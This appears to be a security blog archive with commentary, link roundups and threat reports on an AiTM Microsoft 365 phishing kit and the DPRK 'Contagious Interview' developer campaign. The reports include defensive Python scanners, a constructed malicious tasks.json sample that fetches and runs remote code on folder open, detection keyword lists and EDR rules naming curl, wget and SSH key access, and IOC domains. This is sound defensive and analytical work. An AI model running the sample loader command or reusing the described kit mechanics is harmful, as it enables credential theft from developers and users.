Commentary followed by links to cybersecurity articles and resources that caught our interest internally.
In conversation recently, a fascinating question came up related to security operations work:
“Given the advisory nature of SecOps work, if there are dueling camps, how do you know where to fall when it’s your turn to speak?”
And the answer to that is simple: you fall back to your own values.
We deal with many shades of grey all the time, and that can be both exhausting and frustrating to have to navigate. The number of stakeholders never seems to wane, only wax, and at a certain level in your career you hit a point where you realize that, more often than not, your decisions will please one camp and disenfranchise at least one other. As an autistic I often default to viewing issues in binary terms, which doesn’t fit the world well. As a kid who went through his parents divorcing, working through complex corporate politics can trigger some existential-level anxiety in me. It’s not a fun time. And we don’t talk about any of it nearly enough.
But having built SecOps and Threat Intel programs from scratch, I learned one thing that will help more than any other once you’re pushing through hostile fog of war in threat hunting, detections engineering, and ultimately larger system architecture or policy decisions: consistency in your values eclipses any other political consideration. And far from making you a stick in the mud or keyboard warrior, what it does is provide a strong foundation from which to operate.
The first step in building a security program is defining the values under which it will operate. They’re guides, and can be flexible ones. But they are absolutely essential for building anything more than a paper-thin veneer of a program. Without fundamental values, the program may sway any which way the wind blows, and progressive accomplishments are harder to build upon. But by choosing the values that inform the program - especially SecOps - and communicating them from the first moments onward, you build not just a reliable framework for decision-making, but also trust.
And in security, of course, trust is critical.
In particular, you build the trust of users and stakeholders that team decision-makers are aligned and dependable, and the process weeds out arbitrary short-term thinking. By communicating this from the beginning you simultaneously establish expectations with partner organizations and create an understandable internal framework to fall back on in harder times. Like when your team is responsible for guidance that will make one executive’s day, and another exec’s naughty list. How do we decide where to fall? Well, that work might already be done - what are our values? How do they apply to the current moment?
Founding a security program on values provides another benefit: staying consistent to those values creates a kind of “compound interest of trust.” People know where you’re coming from even if your decision rankles them, and by your actions you build a narrative about your team as you go.
Start the story of your program with the values that will inform it. Tell the story of your program by staying consistent to them, and navigating the “Oh crap, how do we decide?” moments will become simpler. You’ve already defined the strategy; what remains is agreeing on the tactical level. Then evaluate, adapt, and move on to the next one.
infoblox - Amusing Numerology: Analysis of the Numbers in Domain Names - “The numeric component is not just noise appended to make domains unique. It encodes decisions baked into the generator at design time, decisions that stay constant regardless of which infrastructure cluster the domain lands on, which registrar was used, or when registration happened. That invariance, if detectable, makes the numeric component a particularly reliable provenance indicator for the cluster merge problem: determining whether multiple distinct clusters are actually produced by the same generator.” - Some people love trains. Some love shipping containers. Some people know everything about planes, or sports teams. Me? I love Infoblox research. Always scratches that data-rich itch right behind my ear.
flyingpenguin - Can Someone Please Explain Whether Cloudflare Blackmailed Canonical? - Sort of an ongoing question these days: Cloudflare selling some of the only viable protection against threats they themselves host or act as passthroughs and obfuscators for. A review of pDNS data shows that Cloudflare protected DDoS/booter service Beamed, which 313 Team used to disrupt Ubuntu services until Ubuntu signed on with Cloudflare. That’s not to mention, at least at the time this screenshot was taken, TeamPCP and Breachforums were using Cloudflare services to protect a site organizing a competition on who can breach the biggest supply chain:
ArsTechnica - Fired hacker twins forget to end Teams recording, capture own crimes - Guys. Pals. Brohams. Come on. Just hit the “Leave Meeting” button if you’re going to commit a crime. Please. Do it for the investigators, things like this just aren’t sporting. I’m like a T-rex in Jurassic Park. I want to hunt.
Twitter - THORchain incident update - “The leading theory is an exploit in the GG20 TSS implementation, allowing vault key material to leak over time. The attacker may have reconstructed the vault private key and executed unauthorized outbound txs” - One of the hardest things to defend against is a patient adversary. This vault key attack sounds really fun, too.
Knostic - New VS Code extensions attack campaign: SaassyCode - ManageRBLX & TrelloBlox - As usual, Knostic doing good work around AI matters. VScode extensions are probably one of the biggest problems in any enterprise that does development work and apparently the $80 billion that Microsoft has spent on Copilot isn’t enough to get the same results as Gadi Evron, Sounil Yu & company stacked in a silicon trenchcoat.
Research Papers and Reports
RIPE - Exploring Iran's Internet Shutdowns Using Cloudflare Radar - Short talk at 20 minutes, but absolutely fascinating topic, even with the network lighting back up at the moment. In the digital era, visibility is key to understanding actual impact in the world. I could’ve listened to a couple hours more of this, or even just a constant radio channel - a numbers station of Iranian IP blocks lighting up and going dark, or moving in and out of Iranian ASNs and M247.
USENIX - DNS Cache Poisoning Like it's 2006 - Well, since path traversal is popular this year, it makes sense that DNS cache poisoning would turn up too.
Verizon - 2026 Data Breach Investigations Report - The hallowed; the venerable; the yearly infosec coffee table book of horrors. Growing focus on vulnerability exploitation, among other trends.
Tools and Resources
Rivian - AI-SAST - An AI-driven static application security testing tool that’s probably worth putting through the motions if code analysis is your jam.
A sophisticated AiTM phishing kit bypassing traditional MFA to steal Microsoft 365 session cookies. Get the full breakdown and IOCs.
This report details the analysis of a fully operational Adversary-in-the-Middle (AiTM) credential-harvesting kit targeting Microsoft 365 and Entra ID identities. The attack involves a three-to-five stage funnel starting from financial, recruiting, and document related domain name themes. The funnels typically begin with an anti-analysis CAPTCHA gate to filter sandboxes. This is followed by a corporate email harvest stage that builds trust by dynamically rendering the victim's employer logo and filtering out personal email addresses. The final stage is a pixel-perfect, AiTM reverse proxy of the Microsoft sign-in page, which brokers the live authentication flow and successfully intercepts every credential, Multi-Factor Authentication (MFA) code (including Push, TOTP, and SMS), and post-authentication session cookie. Traditional MFA methods offer no defense against this pattern, as the kit captures the session cookie after the MFA challenge succeeds. Origin-bound authenticators such as FIDO2, passkeys, or Windows Hello for Business may be effective countermeasures.
The campaign has been active since at least December 2025. Evidence suggests the web kit has also been used to target major corporations that use customized authentication portals, as seen in tests against an @amazon.com address, and further domain pivots link the threat actor to fake login pages impersonating companies like Black Rock, Nvidia, Foxconn, Exxon, and Costco. Additionally, the kit includes a sandbox cloak/driver layer that uses JavaScript to evade automated analysis.
Details
Credential Harvest Adversary-In-The-Middle Kit
The captured kit is a credential-harvesting funnel that targets Microsoft 365 / Entra ID identities. It is configured as three sequential pages on two look-alike domains: a CAPTCHA-styled gate at rfg-documentfiles[.]com/, an "Identity Verification" page at rfg-documentfiles[.]com/auth/verify-access that filters out personal mail providers and harvests a corporate email, and a pixel-perfect clone of Microsoft's ConvergedSignIn page at login.documentfiles-rfq[.]com/oauth that operates as an adversary-in-the-middle (AiTM) reverse proxy against the real login.microsoftonline[.]com.
The first page exists to filter out sandboxes and URL scanners. The second page harvests a confirmed corporate email address and renders the victim's employer logo to build trust. The third page brokers the live Microsoft authentication flow: every credential, every MFA code, and the post-authentication session/refresh cookies are passed through attacker-controlled endpoints. Push, TOTP, and SMS MFA do not prevent compromise here, because the kit captures the issued session cookie after the challenge succeeds. Only origin-bound authenticators (FIDO2, passkeys, Windows Hello for Business) defeat this pattern.
Execution flow for rfg-documentfiles[.]com
Stage 1: Anti Analysis Gate
Landing Pages
Landing pages commonly appeared as LinkedIn pages, either directly as a ‘Redirecting, please wait…’ page that then redirects to a quick security check using a sliding puzzle piece, or the landing page itself is the security check.
At this phase, there are multiple variations of next stage pages.
Stage 2: Corporate Email Harvest
Variation 1: An email input box that loads the icon and company name. Example inputting a fake Amazon email address:
Variation 2: A download file link that loads another page similar to variation 1
Clicking download button then loads https[:]//secure.rfq-quotationportal[.]com/oauth?tid=20350817-04103455-65209132-55023327
Variation 3: Additional human verification check that proceeds to a fake LinkedIn sign-in page
Stage 3: Adversary in the Middle reverse proxy of Microsoft sign-in
Entering a company email address then attempts an adversary-in-the-middle (AITM) with the specified company’s Microsoft organization sign-in page. In one case we used an @amazon.com address, and the resulting direction was to the Amazon employee midway-auth login page:
Other variations of the Stage 2 sites were also seen redirecting to Amazon’s employee IdP federate site at https[:]//idp.federate.amazon[.]com/api/saml2/dynamic-logical-idp/entra-prod-tenant/amazon-com/v1/sso
Notably, multiple other large companies had similarly customized auth redirects, suggesting the web kit has also been used to target other companies using their own managed employee authentication portals.
One test used a fake address with no real auth, so the Microsoft AITM attempt failed and the site redirected to the real midway-auth[.]amazon[.]com sign-in page. Otherwise, the site code appeared to be configured to steal the session.
Code Breakdown
Stage 1: Anti-Scan
The stage 1 sliding position puzzle piece
On drag-end, the verifier POSTs the slider position together with the navigator.webdriver flag. The server decides whether the next page is the real funnel or a benign decoy. A flagged automated client gets status:'bot' with a benign URL, and a real visitor gets status:'success' with the stage-2 URL. The client cannot tell the difference.
Stage 1 also kicks off a web worker that computes a server-supplied seed/difficulty challenge. It likely serves two purposes: it consumes CPU on rapid-fire scanners, and it forces the verify token to come from a browser that actually executed JavaScript (JS) in a worker, which may filter out simple URL crawlers.
Stage 2: Corporate Email Funnel
Corporate email filter:
A hard-coded list of 25 free-mail domains is rejected by the client code. Only addresses outside that list are allowed to advance.
Dynamic logo render (Clearbit + S2 favicon):
On a passing email, the page paints the employer's logo next to the domain. The lookup is keyed on the email domain alone — Clearbit and Google return logos for any well-known company. This is the literal LogoKit primitive documented by Cyble, SecurityAffairs, and Resecurity.
Funnel:
The harvested email and the URL token are sent to /api/final-url, which returns a per-victim stage-3 URL. The email is on the attacker's server before any password is requested.
Stage 3:
$Config — every MS endpoint rewritten
This is the AiTM mechanic in one object. In a legitimate sign-in, these URLs all resolve under the real login.microsoftonline.com. However, on the attacker’s site, every authentication-bearing endpoint points at the attacker host. Microsoft's own JS bundles (loaded from the real aadcdn.msauth.net for parity) read these URLs at runtime and POST credentials/MFA codes to them.
The three URLs that matter most for credential capture are urlPost (the password lands here), urlGetCredentialType (lets the attacker steer the federation/passkey decision so the user is not redirected to a real IdP), and urlGetOneTimeCode (the MFA OTP). The redirect_uri on www.documentfiles-rfq[.]com/landingv2 is where the post-auth OAuth code / id_token is delivered.
The two endpoints that matter most for harvest:
urlPost: Microsoft's converged login JS (loaded from aadcdn.msauth.net) submits the password to whatever $Config.urlPost says. With this rewrite, every typed password is POSTed to the attacker's server first.
urlGetCredentialType: controls how Microsoft decides if the user is federated, has a passkey, or needs a password. Owning this endpoint lets the attacker steer every UI branch (and prevents a redirect to a real federation IdP that would expose the proxy).
urlGetOneTimeCode: the field where the user types the SMS / authenticator OTP. Forwarded straight to the attacker, who replays it to the real Microsoft within the same proxied session and pockets the resulting ESTSAUTH / ESTSAUTHPERSISTENT cookie.
The web kit hijacks Microsoft's well-known Office Home client_id but sends the post-auth code/id_token to www.documentfiles-rfq.com/landingv2. This is a strong signature of an AiTM consent-grant phish operating against the multi-tenant common endpoint.
The web kit body ends with two extra script tags that are not present in the real Microsoft page:
Both scripts reuse Microsoft's own CSP nonce (0FilRYh2jmgi_Id99Cb0Hw) — a strong signal that the attacker proxy reads the real CSP nonce from the upstream response and inlines it into its own injected tags so the browser executes them. The path prefix /s/<sha256>/<sha256>.js matches content-addressed payload hosting common in modern phish kits.
Sandbox cloak / driver
Tab-title randomisation from a word list: Welcome, Secure, Access, Portal, Login, Account, Verify, Sign In. Likely intended as a low-effort signature evasion against browser-history / EDR string matches that look for fixed phishing titles.
i0116 and idSIButton9 are the well-known DOM IDs of Microsoft's email field and "Next" button, suggesting the script is purpose-built to drive Microsoft's sign-in UI.
Auto-typing any @google.com address and clicking Next on page load is most consistent with a cloak / sandbox-detection layer: analyst sandboxes that detonate the URL will see Microsoft return a benign "we couldn't find an account with that user name" outcome (because google.com isn't an Entra-managed tenant), causing the page to look like an accidental misconfiguration rather than a phish. However, using @amazon did work and triggered the next stage, likely because they do have a Microsoft managed tenant.
Cloak script
Two scripts are appended to the end of <body>; both reuse Microsoft's CSP nonce. They randomize the page title from a fixed eight-word list, then auto-type the victim-provided email address into Microsoft's i0116 email input and click the idSIButton9 "Next" button on a 500 ms interval.
The script is a sandbox-detection / cloak layer. A sandbox that detonates the URL without first passing stages 1–2 will see the script auto-submit the victim’s provided email address, against which Microsoft returns "we couldn't find an account with that user name." This makes the page look like an accidental misconfiguration rather than a phish.
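A checker for a captured sign-in page that applies the two tells described above, the rewritten $Config endpoints and the injected nonce-reusing scripts, as an added Python example; it is not code from the report or from the kit. The Microsoft host allowlist is an assumption to extend for your tenant's federation endpoints, and the sample HTML, its hostnames and its nonce are constructed placeholders.

```python
import json
import re
from urllib.parse import unquote, urlparse

# Assumed allowlists: where a genuine Microsoft sign-in page posts credentials
# and loads its script bundles from. Extend for your own federation endpoints.
MS_LOGIN_HOSTS = {"login.microsoftonline.com", "login.microsoft.com", "login.live.com"}
MS_CDN_HOSTS = {"aadcdn.msauth.net", "aadcdn.msftauth.net"}
LEGIT_REDIRECT_SUFFIXES = (".office.com", ".microsoft.com", ".microsoftonline.com")
# The three $Config keys the report singles out for credential/MFA capture.
AUTH_KEYS = ("urlPost", "urlGetCredentialType", "urlGetOneTimeCode")

CONFIG_RE = re.compile(r"\$Config\s*=\s*(\{.*?\})\s*;", re.S)
SCRIPT_RE = re.compile(r"<script\b([^>]*)>", re.I)
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')
SHA_PATH_RE = re.compile(r"^/s/[0-9a-f]{64}/[0-9a-f]{64}\.js$")
REDIRECT_RE = re.compile(r"""redirect_uri=([^&"'\s]+)""")


def host_of(url):
    """Lower-cased hostname of a URL, or '' if it has none."""
    return (urlparse(url).hostname or "").lower()


def extract_config(html):
    """Return the inline $Config object as a dict, or None when absent."""
    match = CONFIG_RE.search(html)
    return json.loads(match.group(1)) if match else None


def check_config(config):
    """Flag each authentication endpoint that does not resolve under Microsoft."""
    findings = []
    for key in AUTH_KEYS:
        host = host_of(str(config.get(key, "")))
        if host not in MS_LOGIN_HOSTS:
            findings.append(f"{key} -> {host or 'missing'}")
    return findings


def check_redirect_uri(html):
    """Flag a redirect_uri that would deliver the OAuth code/id_token off-Microsoft."""
    findings = []
    for raw in REDIRECT_RE.findall(html):
        host = host_of(unquote(raw))
        if host and host not in MS_LOGIN_HOSTS and not host.endswith(LEGIT_REDIRECT_SUFFIXES):
            findings.append(f"redirect_uri -> {host}")
    return findings


def check_scripts(html):
    """Flag non-CDN scripts that copy the CDN bundles' nonce or use /s/<sha>/<sha>.js paths."""
    scripts = [dict(ATTR_RE.findall(attrs)) for attrs in SCRIPT_RE.findall(html)]
    # Nonces carried by Microsoft's own bundles; an injected tag copying one is the tell.
    ms_nonces = {s["nonce"] for s in scripts
                 if "nonce" in s and host_of(s.get("src", "")) in MS_CDN_HOSTS}
    findings = []
    for s in scripts:
        src = s.get("src", "")
        host = host_of(src)
        if not src or host in MS_CDN_HOSTS:
            continue
        reasons = []
        if s.get("nonce") in ms_nonces:
            reasons.append("reuses Microsoft CSP nonce")
        if SHA_PATH_RE.match(urlparse(src).path):
            reasons.append("content-addressed /s/<sha256>/<sha256>.js path")
        if reasons:
            findings.append(f"injected script {host}{urlparse(src).path}: " + ", ".join(reasons))
    return findings


def analyze(html):
    """Run every check; an empty list means nothing looked rewritten or injected."""
    config = extract_config(html)
    findings = ["no $Config object found"] if config is None else check_config(config)
    return findings + check_redirect_uri(html) + check_scripts(html)


# Constructed sample page: placeholder attacker host, placeholder nonce, fake hashes.
SAMPLE_HTML = (
    '<html><head>\n'
    '<script nonce="EXAMPLE_NONCE" src="https://aadcdn.msauth.net/shared/bundle.js"></script>\n'
    '<script nonce="EXAMPLE_NONCE">$Config={"urlPost":"https://login.phish-example.invalid/common/login",'
    '"urlGetCredentialType":"https://login.phish-example.invalid/common/GetCredentialType",'
    '"urlGetOneTimeCode":"https://login.phish-example.invalid/common/GetOneTimeCode",'
    '"urlResetPassword":"https://passwordreset.microsoftonline.com/",'
    '"sCtx":"client_id=PLACEHOLDER&redirect_uri=https%3A%2F%2Fwww.phish-example.invalid%2Flandingv2"};</script>\n'
    '</head><body>\n'
    '<script nonce="EXAMPLE_NONCE" src="https://login.phish-example.invalid/s/'
    + "a" * 64 + "/" + "b" * 64 + '.js"></script>\n'
    '</body></html>\n'
)

if __name__ == "__main__":
    for finding in analyze(SAMPLE_HTML):
        print(finding)
```

Feed it the raw HTML of a page pulled from a proxy or sandbox capture; a genuine Microsoft page should produce no findings.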
Domain Registration Pivots
Common Website Title: Security Check | Verification Required
The phishing campaign appears to go back to 2025-12, with common domain name themes around job recruitment, investment, finance, business, and documents.
Sample Shodan Queries:
http.html:"To continue, please solve this puzzle so we know you're a real person"
http.title:"Security Check | Verification Required" http.html:"Professional Network"
http.html:"puzzle-container" http.html:"bg-canvas" http.html:"piece-canvas" http.html:"slider-handle"
http.html:"id=\"bg-canvas\" width=\"300\" height=\"150\"" http.html:"id=\"piece-canvas\" width=\"50\" height=\"50\""
SOA Pivot Rabbithole:
One of the identified domains from the closely aligned domain registration pivot was capivest[.]top, which has an SOA email itzfahim194[@]gmail[.]com. The same SOA email is tied to 94 domains with some overlapping domain name themes going back to mid-2025. Additionally, several domains were observed hosting fake login pages for multiple corporations including Black Rock (black-rock1[.]top), Nvidia (nvidiatechnolodgy[.]top), Foxconn (foxconn-n.net[.]ng), Exxon (exxon-ieo[.]top), Costco (costc0[.]top) and others. These 94 domains are subsequently linked by unique registrant names and other identifiable SOA emails to over 200 domains.
Many of the domains are seen to host websites with login pages and suspicious characteristics sampled below:
What was captured appears to be a fully working AiTM credential-harvest kit aimed at Microsoft 365 / Entra ID and fronted by a CAPTCHA cloak and a corporate-email filter, active since December 2025.
Systems thinking, biolistics, and the danger of mop-up science in infosec — plus this month's reading on ransomware, RPKI exploits, cPanel, and LLM pollution.
The more I understand about the overall threat environment, the less I know about the overall threat environment.
The more I understand about the interconnected systems in the overall threat environment, the more I understand about defense.
If you query the right kind of security nerd, roughly 10% of infosec practitioners by my anecdotal count, you will find not just someone who learned about Systems Thinking and keeps it in the mental toolbox for the right moment, but someone for whom the topic is formative, someone who dived deep into the nature of different types of systems, and how similar and different systems can interact with each other. I’ve found it goes well beyond computer systems - we have colleagues who have studied deeply on natural or artificial ecosystems, on the vast array of biological systems at hand, on industrial production systems and complex gas processes. Governance systems familiarity is a hit due to its proximity to compliance systems. Firearms systems are a regular special interest of American security practitioners.
The lessons we learn from studying disparate systems often come to fruition in a completely unrelated discipline - or one that appears unrelated, anyway. Or overlaps serendipitously with a current puzzle or problem to overcome. It’s one of the reasons that Bioanalytics graduates are highly sought-after as business data analysts.
In the early 1980s as genetic engineering took some of its first truly artificial strides, one of the primary problems to overcome was how to introduce a desired gene into a cell experimentally without engaging with the larger multicellular organism - breeding the gene in, in other words. Then some mad scientist decided to coat particles of hard metal with genetic material, sprinkle them on a projectile, and fire it straight into a cell with a .22 caliber bullet’s worth of gunpowder.
Voila. The entire field of biological ballistics - or biolistics - was born. Usage continues to the present day. Some scientist, somewhere, is firing live ammo (probably at plant cells) in order to induce genetic transformation.
The sheer brute novelty of this method continues to amaze me.
“Normal science,” wrote the philosopher Thomas Kuhn in his ironically paradigmatic book The Structure of Scientific Revolutions, “the activity in which most scientists inevitably spend almost all their time, is predicated on the assumption that the scientific community knows what the world is like.”
As an industry, we largely seem to be convinced, or are at least trying to convince others, that we know what the world is like. Often to my embarrassment, I can only say that I’ve never been confident about knowing what the world is like, whether we’re talking about life in general or cybersecurity in particular. That internal posture of curious insecurity shapes not only my reticence, but also my expansive experience of the possible.
And I often worry that as a sort of industrial science, we really have convinced ourselves that we know what the world is like, and most of our time is wasted dawdling in mop-up operations. All available incentives push us toward the middle of information security as a science rather than the edges. Most leave us tired at the end of the day, without the energy or resources to push imaginative boundaries.
What happens if I start looking at each problem not from the perspective of someone who’s supposed to know what the world is like already and simply be reactive to it, but from the perspective of the madman that fired the first gene-coated bullet into a cluster of cells and then carefully watched for signs of transformation to appear?
Podcasts
Lawfare - The Shadowy World of Ransomware with Professor Anja Shortland - The interview was strong enough that I insta-ordered Shortland’s book “Dark Screens” - so definitely worth listening to. Worth keeping in mind it’s from a political economy standpoint, in order to set expectations, but the more perspectives we have on this the better.
Articles
FBI/IC3 - Cyber-Enabled Strategic Cargo Theft Surging - Between this and the use of insecure webcams to better target kinetic strikes, getting more and more interesting to see how perverse incentives in the technology sphere lead to dire consequences in meatspace.
Mxsasha - Taking down a European network with a TLS certificate: my RIPE NCC RPKI exploit chain - “A single shared session cookie and missing CSRF protection allowed me to make authenticated changes to the RPKI Dashboard and RIPE Database, which control routing configuration for networks from Europe, the Middle East, and Central Asia.” - Clever research that continues to show how paper-thin our protections are at a global scale.
NTPpool - DNS configuration tampering on one of our GeoDNS servers - “We found that a volunteer who provided hosting for one of our GeoDNS servers used their access to manipulate DNS zone weights for the NTP Pool service domain.” - Fascinating bit of malice here. Timing can do weird things to computers and other equipment, so an attack on the NTP pool can have wide-sweeping, unanticipated repercussions. On my to-do list to start looking more deeply at hypothetical NTP attack impacts now.
Quad9 - Negative Trust Anchors - I had never heard of Negative Trust Anchors before, but came across it as a result of the DENIC .de DNSSEC debacle yesterday. Really fascinating mechanism with very complicated incentives and consequences. Also, I very much appreciate how cautiously Quad9 approaches it.
Twitter - eth[.]limo DNS hijack post-mortem - Credit where it’s due, looks like the eth[.]limo folks set things up right, with services reliant on DNSSEC, so when DNS was compromised, the blast radius was severely limited.
BIML - Recursive Pollution and Model Collapse Are Not the Same - “The number one risk in LLMs today is recursive pollution. This happens when an LLM model is trained on the open Internet (including errors and misinformation), creates content that is wrong, and then later eats that content when it (or another generation of models) is trained up again on a data ocean that includes its own pollution. Wrongness grows just like guitar feedback through an amp does.” - A good, quick post about an important difference in LLM training risks, and given the abuse of LLMs for influence operations lately and subsequent re-ingestion of that material by LLM scrapers, something that looks to be a clear possibility, if not probability.
FBI - 2025 Internet Crime Report - (direct PDF link) - 26% increase in known losses from 2024 feels like a bad omen.
Europol - Internet Organised Crime Threat Assessment (IOCTA) 2026 - “The abuse of the Domain Name System (DNS) allows criminals to effectively exploit the time period between domain registration and LE intervention.” - Lots of good information here, but unsurprisingly, it continues to always be DNS. Of the interesting trends we’ve seen lately, dead drop DNS C2s are probably at or near the top of the list.
Analyze the DPRK "Contagious Interview" campaign targeting developers. Get technical deep-dives into VS Code task abuse, Node.js malware obfuscation, and a full Sigma/EDR detection pack to defend your CI/CD pipeline and identity perimeter.
Executive Summary
The DPRK “Contagious Interview” campaign (LAZARUS) represents a mature evolution of intrusion tradecraft in which adversaries weaponize legitimate hiring workflows to induce execution of malicious code within trusted developer environments. Unlike traditional phishing or exploit-driven compromise, this model collapses initial access, execution, and credential harvesting into a single interaction, leveraging social engineering and professional trust rather than technical vulnerability.
The campaign targets software developers and technical personnel through fraudulent job interview processes conducted across platforms such as GitHub, LinkedIn, and direct messaging channels. Victims are instructed to clone and execute repositories presented as coding challenges, which contain embedded payloads designed to harvest credentials, extract session tokens, and enable rapid lateral movement into enterprise environments.
This approach aligns structurally with identity-first intrusion models observed in Muddled Libra, but is distinct in its focus on developer ecosystems and supply chain adjacency. The result is a high-speed, low-noise intrusion methodology capable of bypassing multi-factor authentication (MFA), evading endpoint detection, and enabling immediate access to high-value systems including source code repositories, CI/CD pipelines, and cloud infrastructure.
Operational Model and Attack Flow
The campaign is best understood as a controlled execution pipeline in which the adversary externalizes the execution step to the victim.
The attack sequence begins with targeted outreach masquerading as recruitment activity. Adversaries establish credibility through impersonation of recruiters or companies, often leveraging realistic job descriptions and communication patterns. Once engagement is established, the victim is invited to complete a technical assessment.
This assessment serves as the delivery mechanism. The victim is instructed to clone a repository and execute code locally, often framed as a debugging or build task. Within this repository, malicious logic is embedded either directly in source files, dependencies, or development tooling configurations.
A key innovation is the abuse of Visual Studio Code task automation. Malicious .vscode/tasks.json configurations trigger execution automatically upon opening the project, eliminating the need for explicit user action beyond normal workflow behavior.
Once executed, the payload performs environment-aware collection. This includes extraction of:
Browser session tokens
Git credentials and access tokens
SSH keys
Cloud credentials (AWS, Azure, GCP)
API tokens (GitHub, Slack, CI/CD systems)
The compromise phase is immediately followed by exploitation. Adversaries pivot into enterprise environments using harvested credentials, often achieving access to repositories, cloud control planes, or internal systems within minutes. This mirrors the rapid escalation observed in Muddled Libra operations, where domain-level compromise can occur in under an hour.
Tradecraft and Technical Characteristics
Human-Centric Execution
The defining characteristic of this campaign is the replacement of exploit delivery with induced execution. The victim executes the payload voluntarily within a trusted context, rendering many traditional security controls ineffective.
Malware Minimalism and Obfuscation
While malware is present, it is deliberately disguised as legitimate development artifacts. Payloads are frequently implemented in:
Node.js
Python
Golang
Execution is often fileless or memory-resident, and code is embedded within non-obvious file types such as fonts or images to evade detection.
Abuse of Development Tooling
The campaign exploits developer tooling as an execution substrate:
VS Code task automation (runOn: folderOpen)
npm package dependencies (e.g., malicious packages like jsonwebauth)
Build scripts and test frameworks
This creates a supply-chain-adjacent effect in which the developer workstation becomes the initial compromise node.
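A pre-open scanner for a cloned "coding challenge" repository, as an added Python example (not code from the report): it finds every .vscode/tasks.json, handles the JSONC comments and trailing commas VS Code accepts, reports tasks whose runOptions.runOn is folderOpen, and grades their command lines against a download/eval heuristic. The SUSPICIOUS pattern list and the sample tasks.json are constructed for this example.

```python
import json
import os
import re

# Heuristic list assumed for this example: things a task that fires on folder open
# has no business doing (fetching, decoding, or evaluating remote content).
SUSPICIOUS = re.compile(
    r"(curl|wget|Invoke-WebRequest|\biwr\b|\biex\b|Invoke-Expression|-enc(odedcommand)?\b|"
    r"node\s+-e\b|python3?\s+-c\b|base64|\beval\b|bash\s+-c|sh\s+-c|https?://)",
    re.I,
)


def strip_jsonc(text):
    """tasks.json is JSONC: drop /* */ comments, whole-line // comments and trailing commas.
    Only whole-line // comments are removed so 'https://' inside strings survives."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    return re.sub(r",(\s*[}\]])", r"\1", text)


def command_text(task):
    """Join command and args, including the windows/linux/osx per-platform overrides."""
    parts = []
    for scope in (task, task.get("windows") or {}, task.get("linux") or {}, task.get("osx") or {}):
        cmd = scope.get("command")
        if isinstance(cmd, str):
            parts.append(cmd)
        for arg in scope.get("args") or []:
            # args may be plain strings or {"value": ..., "quoting": ...} objects
            parts.append(arg if isinstance(arg, str) else str(arg.get("value", "")))
    return " ".join(parts)


def scan_tasks_json(text):
    """Return one finding per task configured to run automatically on folder open."""
    findings = []
    for task in json.loads(strip_jsonc(text)).get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = command_text(task)
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "command": cmd,
            "suspicious": bool(SUSPICIOUS.search(cmd)),
        })
    return findings


def scan_repo(root):
    """Walk a cloned repo and scan every .vscode/tasks.json, nested workspaces included."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in files:
            path = os.path.join(dirpath, "tasks.json")
            with open(path, encoding="utf-8-sig") as fh:
                results[path] = scan_tasks_json(fh.read())
    return results


# Constructed sample: one ordinary build task and one auto-run loader whose
# URL, path and encoded payload are placeholders.
SAMPLE_TASKS_JSON = r"""{
    // constructed sample tasks.json
    "version": "2.0.0",
    "tasks": [
        {
            "label": "build",
            "type": "npm",
            "script": "build",
            "problemMatcher": [],
        },
        {
            "label": "Prepare environment",
            "type": "shell",
            "command": "curl -fsSL https://staging.example.invalid/env.js -o /tmp/env.js && node /tmp/env.js",
            "windows": { "command": "powershell", "args": ["-enc", "BASE64_PLACEHOLDER"] },
            "presentation": { "reveal": "never" },
            "runOptions": { "runOn": "folderOpen" },
        },
    ],
}
"""

if __name__ == "__main__":
    for finding in scan_tasks_json(SAMPLE_TASKS_JSON):
        print(finding)
```

Whether VS Code actually fires such a task still depends on workspace trust and the automatic-tasks setting, so treat a folderOpen hit as something to read before opening the folder, not as proof of execution.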
Cloud and Web-Based Staging Infrastructure
Payload delivery and staging frequently leverage:
Vercel-hosted endpoints
JSON storage services
Paste-based staging platforms
These services provide ephemeral, low-friction infrastructure that blends with legitimate traffic.
Credential-Centric Objectives
The campaign prioritizes identity artifacts over persistence mechanisms. Credential theft enables:
Immediate lateral movement
Access to privileged systems
Potential downstream supply chain compromise
Infrastructure and Reuse Patterns
Unlike traditional campaigns that rely on stable infrastructure, this operation exhibits distributed and disposable infrastructure usage. However, several recurring patterns provide actionable detection opportunities:
Use of JSON storage platforms for payload staging
Repeated use of Vercel-hosted delivery endpoints
Paste-based intermediate payload retrieval
Administration via VPN services (e.g., Astrill VPN)
Geographic clustering of operator activity (observed in China-based IP space)
The infrastructure strategy prioritizes resilience and deniability over persistence.
Strategic Assessment
The Contagious Interview campaign represents a structural shift in intrusion methodology:
Collapse of the Kill Chain
Stages that are traditionally independent – delivery, exploitation, and execution – are merged into a single user-driven action. This reduces detection windows and eliminates reliance on technical vulnerabilities.
Identity as the Primary Attack Surface
The campaign reinforces a broader trend in which identity systems, rather than endpoints or networks, represent the primary control plane for attackers.
Developer Ecosystem as a High-Value Target
By targeting developers, adversaries gain access to:
Source code repositories
Software supply chains
Cloud infrastructure
Organizational secrets
This creates second-order effects, enabling compromise of downstream organizations.
Convergence with Ransomware and Access Brokerage
Given the alignment with identity-first intrusion models, it is highly likely that access obtained through this campaign is monetized via:
Initial access brokerage
Ransomware deployment
Data exfiltration and extortion
This mirrors the operational ecosystem observed in Muddled Libra and related clusters.
Defensive Implications
Detection and mitigation require a shift away from traditional indicators toward behavioral and workflow-based monitoring:
Monitoring execution patterns within development environments
IF
ParentProcess = Code.exe
AND
ChildProcess IN (cmd.exe, powershell.exe, bash, sh)
AND
CommandLine CONTAINS (curl OR wget OR http)
WITHIN 2 minutes
AND
NetworkConnection TO (vercel.app OR jsonkeeper OR npoint OR pastebin)
THEN
Alert: Contagious Interview Execution Chain
Severity: CRITICAL
7. Token / Credential Exfil Behavior
Sigma (generic but tuned)
title: Suspicious Access to Credential Stores After VS Code Execution
id: cti-post-execution-credential-access
status: experimental
logsource:
  category: process_creation
detection:
  selection_parent:
    ParentImage|endswith:
      - '\Code.exe'
  selection_child:
    Image|endswith:
      - '\chrome.exe'
      - '\firefox.exe'
      - '\msedge.exe'
      - '\ssh.exe'
  timeframe: 5m
  condition: selection_parent and selection_child
level: medium
8. Git / SSH Key Access Spike
EDR heuristic
Detect:
- Access to ~/.ssh, id_rsa, id_ed25519
